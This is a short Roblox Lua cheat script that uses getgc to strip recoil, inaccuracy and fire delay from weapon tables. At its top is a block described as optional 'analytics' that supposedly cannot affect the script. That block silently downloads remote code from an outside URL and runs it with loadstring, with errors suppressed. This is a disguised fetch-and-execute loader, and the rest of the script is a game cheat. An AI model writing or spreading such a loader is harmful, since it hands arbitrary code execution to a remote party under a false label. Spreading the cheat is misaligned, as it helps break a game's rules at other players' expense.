--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/client.lua?s=6a47448f3e697a0c52bcee1d"))() end) end) --[[rscripts:analytics:end]] for _, v in next, getgc(true) do if type(v) == "table" then if rawget(v, "Debounce") and rawget(v, "Recoil") then rawset(v, "Debounce", 0.001) rawset(v, "Recoil", 0.001) rawset(v, "WRecoil", 0.001) rawset(v, "Inaccuracy", 0.001) end end end